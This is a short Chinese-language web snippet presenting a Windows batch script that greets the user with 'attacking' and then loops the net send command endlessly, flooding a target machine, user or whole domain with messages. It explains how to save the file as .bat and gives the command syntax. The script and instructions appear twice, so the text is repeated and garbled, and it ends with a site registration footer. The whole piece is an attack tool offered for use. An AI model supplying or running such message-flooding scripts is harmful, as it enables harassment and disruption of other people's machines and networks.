@echo 正在攻击中
start
@net send %1 %2
@if errorlevel 1 goto over
goto start
:over
@echo 发送失败
文件保存为.bat格式。
使用语法:
NET SEND
{name | * | /DOMAIN[:name] | /USERS} message
start
@net send %1 %2
@if errorlevel 1 goto over
goto start
:over
@echo 发送失败
文件保存为.bat格式。
使用语法:
NET SEND
{name | * | /DOMAIN[:name] | /USERS} message
浙公网安备 33010602011771号